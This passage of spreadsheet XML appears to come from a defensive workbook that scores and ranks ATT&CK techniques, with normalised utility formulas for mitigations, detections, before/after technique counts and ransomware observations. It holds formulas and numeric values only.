        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I331" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J331" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K331" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L331" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M331" s="37">
        <v>0</v>
      </c>
      <c r="N331" s="56">
        <v>0</v>
      </c>
      <c r="O331" s="56">
        <v>0</v>
      </c>
      <c r="P331" s="56">
        <v>0</v>
      </c>
      <c r="Q331" s="56">
        <v>8</v>
      </c>
      <c r="R331" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S331" s="57">
        <v>3</v>
      </c>
      <c r="T331" s="57" t="s">
        <v>1154</v>
      </c>
      <c r="U331" s="57">
        <v>1</v>
      </c>
      <c r="V331" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.6190333333333332E-2</v>
      </c>
      <c r="W331" s="37">
        <v>4</v>
      </c>
      <c r="X331" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Y331" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Z331" s="37">
        <v>8</v>
      </c>
      <c r="AA331" s="37">
        <v>0.08</v>
      </c>
      <c r="AB331" s="37">
        <v>0.08</v>
      </c>
      <c r="AC331" s="37"/>
      <c r="AD331" s="50" t="s">
        <v>1155</v>
      </c>
      <c r="AE331" s="37" t="str" cm="1">
        <f t="array" ref="AE331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF331" s="37">
        <v>327</v>
      </c>
      <c r="AG331" s="37" t="str" cm="1">
        <f t="array" ref="AG331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH331" s="37">
        <v>327</v>
      </c>
      <c r="AI331" s="37" t="str" cm="1">
        <f t="array" ref="AI331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ331" s="37">
        <v>327</v>
      </c>
      <c r="AK331" s="37" t="str" cm="1">
        <f t="array" ref="AK331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD331)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL331" s="37">
        <v>327</v>
      </c>
      <c r="AM331" s="37" t="str" cm="1">
        <f t="array" ref="AM331">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD331)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN331" s="37">
        <v>0</v>
      </c>
      <c r="AO331" s="37">
        <v>0</v>
      </c>
      <c r="AP331" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ331" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>76.877715444444448</v>
      </c>
      <c r="AR331" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS331" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT331" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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32" spans="1:47" ht="85">
      <c r="A332" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B332" s="37">
        <f t="shared" si="5"/>
        <v>568.96685423809515</v>
      </c>
      <c r="C332" s="37" t="s">
        <v>1156</v>
      </c>
      <c r="D332" s="50" t="s">
        <v>1157</v>
      </c>
      <c r="E332" s="37"/>
      <c r="F332" s="37">
        <v>1</v>
      </c>
      <c r="G332" s="37">
        <v>1</v>
      </c>
      <c r="H332" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I332" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J332" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K332" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L332" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M332" s="37">
        <v>0</v>
      </c>
      <c r="N332" s="56">
        <v>0</v>
      </c>
      <c r="O332" s="56">
        <v>4</v>
      </c>
      <c r="P332" s="56">
        <v>6</v>
      </c>
      <c r="Q332" s="56">
        <v>2</v>
      </c>
      <c r="R332" s="57" t="s">
        <v>1158</v>
      </c>
      <c r="S332" s="57">
        <v>9</v>
      </c>
      <c r="T332" s="57" t="s">
        <v>1159</v>
      </c>
      <c r="U332" s="57">
        <v>20</v>
      </c>
      <c r="V332" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.33333347619047615</v>
      </c>
      <c r="W332" s="37">
        <v>29</v>
      </c>
      <c r="X332" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Y332" s="37">
        <v>0.52727299999999999</v>
      </c>
      <c r="Z332" s="37">
        <v>12</v>
      </c>
      <c r="AA332" s="37">
        <v>0.12</v>
      </c>
      <c r="AB332" s="37">
        <v>0.12</v>
      </c>
      <c r="AC332" s="37"/>
      <c r="AD332" s="50" t="s">
        <v>1160</v>
      </c>
      <c r="AE332" s="37" t="str" cm="1">
        <f t="array" ref="AE332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD332)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF332" s="37">
        <v>328</v>
      </c>
      <c r="AG332" s="37" t="str" cm="1">
        <f t="array" ref="AG332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD332)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH332" s="37">
        <v>328</v>
      </c>
      <c r="AI332" s="37" t="str" cm="1">
        <f t="array" ref="AI332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD332)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ332" s="37">
        <v>328</v>
      </c>
      <c r="AK332" s="37" t="str" cm="1">
        <f t="array" ref="AK332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD332)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AL332" s="37">
        <v>328</v>
      </c>
      <c r="AM332" s="37" t="str" cm="1">
        <f t="array" ref="AM332">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD332)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN332" s="37">
        <v>0</v>
      </c>
      <c r="AO332" s="37">
        <v>0</v>
      </c>
      <c r="AP332" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ332" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>189.65561807936504</v>
      </c>
      <c r="AR332" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS332" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT332" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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33" spans="1:47" ht="34">
      <c r="A333" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B333" s="37">
        <f t="shared" si="5"/>
        <v>294.75739371428568</v>
      </c>
      <c r="C333" s="37" t="s">
        <v>1161</v>
      </c>
      <c r="D333" s="50" t="s">
        <v>1162</v>
      </c>
      <c r="E333" s="37"/>
      <c r="F333" s="37">
        <v>1</v>
      </c>
      <c r="G333" s="37">
        <v>1</v>
      </c>
      <c r="H333" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I333" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J333" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K333" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L333" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M333" s="37">
        <v>0</v>
      </c>
      <c r="N333" s="56">
        <v>0</v>
      </c>
      <c r="O333" s="56">
        <v>0</v>
      </c>
      <c r="P333" s="56">
        <v>0</v>
      </c>
      <c r="Q333" s="56">
        <v>0</v>
      </c>
      <c r="R333" s="57" t="s">
        <v>1163</v>
      </c>
      <c r="S333" s="57">
        <v>7</v>
      </c>
      <c r="T333" s="57" t="s">
        <v>597</v>
      </c>
      <c r="U333" s="57">
        <v>6</v>
      </c>
      <c r="V333" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380971428571429</v>
      </c>
      <c r="W333" s="37">
        <v>13</v>
      </c>
      <c r="X333" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y333" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z333" s="37">
        <v>0</v>
      </c>
      <c r="AA333" s="37">
        <v>0</v>
      </c>
      <c r="AB333" s="37">
        <v>0</v>
      </c>
      <c r="AC333" s="37"/>
      <c r="AD333" s="50" t="s">
        <v>559</v>
      </c>
      <c r="AE333" s="37" t="str" cm="1">
        <f t="array" ref="AE333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF333" s="37">
        <v>329</v>
      </c>
      <c r="AG333" s="37" t="str" cm="1">
        <f t="array" ref="AG333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH333" s="37">
        <v>329</v>
      </c>
      <c r="AI333" s="37" t="str" cm="1">
        <f t="array" ref="AI333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD333)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ333" s="37">
        <v>329</v>
      </c>
      <c r="AK333" s="37" t="str" cm="1">
        <f t="array" ref="AK333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL333" s="37">
        <v>329</v>
      </c>
      <c r="AM333" s="37" t="str" cm="1">
        <f t="array" ref="AM333">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD333)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN333" s="37">
        <v>0</v>
      </c>
      <c r="AO333" s="37">
        <v>0</v>
      </c>
      <c r="AP333" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ333" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>98.252464571428561</v>
      </c>
      <c r="AR333" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS333" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT333" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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34" spans="1:47" ht="17">
      <c r="A334" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B334" s="37">
        <f t="shared" si="5"/>
        <v>588.1597125238095</v>
      </c>
      <c r="C334" s="37" t="s">
        <v>1164</v>
      </c>
      <c r="D334" s="50" t="s">
        <v>1165</v>
      </c>
      <c r="E334" s="37"/>
      <c r="F334" s="37">
        <v>3</v>
      </c>
      <c r="G334" s="37">
        <v>2</v>
      </c>
      <c r="H334" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I334" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.3</v>
      </c>
      <c r="J334" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="K334" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L334" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M334" s="37">
        <v>0</v>
      </c>
      <c r="N334" s="56">
        <v>0</v>
      </c>
      <c r="O334" s="56">
        <v>2</v>
      </c>
      <c r="P334" s="56">
        <v>3</v>
      </c>
      <c r="Q334" s="56">
        <v>0</v>
      </c>
      <c r="R334" s="57" t="s">
        <v>1166</v>
      </c>
      <c r="S334" s="57">
        <v>8</v>
      </c>
      <c r="T334" s="57" t="s">
        <v>1167</v>
      </c>
      <c r="U334" s="57">
        <v>10</v>
      </c>
      <c r="V334" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.1952382380952381</v>
      </c>
      <c r="W334" s="37">
        <v>18</v>
      </c>
      <c r="X334" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y334" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z334" s="37">
        <v>5</v>
      </c>
      <c r="AA334" s="37">
        <v>0.05</v>
      </c>
      <c r="AB334" s="37">
        <v>0.05</v>
      </c>
      <c r="AC334" s="37"/>
      <c r="AD334" s="50" t="s">
        <v>1168</v>
      </c>
      <c r="AE334" s="37" t="str" cm="1">
        <f t="array" ref="AE334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD334)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF334" s="37">
        <v>330</v>
      </c>
      <c r="AG334" s="37" t="str" cm="1">
        <f t="array" ref="AG334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH334" s="37">
        <v>330</v>
      </c>
      <c r="AI334" s="37" t="str" cm="1">
        <f t="array" ref="AI334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD334)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ334" s="37">
        <v>330</v>
      </c>
      <c r="AK334" s="37" t="str" cm="1">
        <f t="array" ref="AK334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL334" s="37">
        <v>330</v>
      </c>
      <c r="AM334" s="37" t="str" cm="1">
        <f t="array" ref="AM334">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD334)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN334" s="37">
        <v>0</v>
      </c>
      <c r="AO334" s="37">
        <v>0</v>
      </c>
      <c r="AP334" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ334" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>196.0532375079365</v>
      </c>
      <c r="AR334" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS334" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT334" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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35" spans="1:47" ht="68">
      <c r="A335" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B335" s="37">
        <f t="shared" si="5"/>
        <v>556.13512023809528</v>
      </c>
      <c r="C335" s="37" t="s">
        <v>1169</v>
      </c>
      <c r="D335" s="50" t="s">
        <v>1170</v>
      </c>
      <c r="E335" s="37"/>
      <c r="F335" s="37">
        <v>1</v>
      </c>
      <c r="G335" s="37">
        <v>1</v>
      </c>
      <c r="H335" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I335" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J335" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K335" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L335" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M335" s="37">
        <v>6.7699999999999998E-4</v>
      </c>
      <c r="N335" s="56">
        <v>0</v>
      </c>
      <c r="O335" s="56">
        <v>0</v>
      </c>
      <c r="P335" s="56">
        <v>0</v>
      </c>
      <c r="Q335" s="56">
        <v>1</v>
      </c>
      <c r="R335" s="57" t="s">
        <v>1171</v>
      </c>
      <c r="S335" s="57">
        <v>14</v>
      </c>
      <c r="T335" s="57" t="s">
        <v>1172</v>
      </c>
      <c r="U335" s="57">
        <v>19</v>
      </c>
      <c r="V335" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.31904761904761902</v>
      </c>
      <c r="W335" s="37">
        <v>33</v>
      </c>
      <c r="X335" s="37">
        <v>0.6</v>
      </c>
      <c r="Y335" s="37">
        <v>0.6</v>
      </c>
      <c r="Z335" s="37">
        <v>1</v>
      </c>
      <c r="AA335" s="37">
        <v>0.01</v>
      </c>
      <c r="AB335" s="37">
        <v>0.01</v>
      </c>
      <c r="AC335" s="37"/>
      <c r="AD335" s="50" t="s">
        <v>1173</v>
      </c>
      <c r="AE335" s="37" t="str" cm="1">
        <f t="array" ref="AE335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD335)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF335" s="37">
        <v>331</v>
      </c>
      <c r="AG335" s="37" t="str" cm="1">
        <f t="array" ref="AG335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD335)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH335" s="37">
        <v>331</v>
      </c>
      <c r="AI335" s="37" t="str" cm="1">
        <f t="array" ref="AI335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD335)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ335" s="37">
        <v>331</v>
      </c>
      <c r="AK335" s="37" t="str" cm="1">
        <f t="array" ref="AK335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD335)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL335" s="37">
        <v>331</v>
      </c>
      <c r="AM335" s="37" t="str" cm="1">
        <f t="array" ref="AM335">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD335)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN335" s="37">
        <v>0</v>
      </c>
      <c r="AO335" s="37">
        <v>0</v>
      </c>
      <c r="AP335" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ335" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>185.37837341269844</v>
      </c>
      <c r="AR335" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS335" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT335" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU33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36" spans="1:47" ht="17">
      <c r="A336" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B336" s="37">
        <f t="shared" si="5"/>
        <v>537.92831828571445</v>
      </c>
      <c r="C336" s="37" t="s">
        <v>1174</v>
      </c>
      <c r="D336" s="50" t="s">
        <v>1170</v>
      </c>
      <c r="E336" s="37" t="s">
        <v>1175</v>
      </c>
      <c r="F336" s="37">
        <v>1</v>
      </c>
      <c r="G336" s="37">
        <v>1</v>
      </c>
      <c r="H336" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I336" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J336" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K336" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L336" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M336" s="37">
        <v>0</v>
      </c>
      <c r="N336" s="56">
        <v>0</v>
      </c>
      <c r="O336" s="56">
        <v>2</v>
      </c>
      <c r="P336" s="56">
        <v>0</v>
      </c>
      <c r="Q336" s="56">
        <v>0</v>
      </c>
      <c r="R336" s="57" t="s">
        <v>1176</v>
      </c>
      <c r="S336" s="57">
        <v>13</v>
      </c>
